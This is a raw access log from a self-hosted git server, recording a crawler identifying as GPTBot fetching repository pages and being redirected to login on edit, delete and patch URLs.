"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:06:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:06:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:06:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:06:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:06:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:06:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:06:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 9846] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10302] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:06:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 11608] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 9780] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 212324] [Gzip 17.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9781] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:17:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12339] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9782] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 21208] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21193] [Gzip 10.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9798] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10276] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py?display=rendered" [Client 74.7.227.38] [Length 11134] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:06:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:17:06:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:06:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:06:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py?display=rendered" [Client 74.7.227.38] [Length 11115] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor.py" +[17/Feb/2026:17:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libpq.dll" +[17/Feb/2026:17:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 862] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:17:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 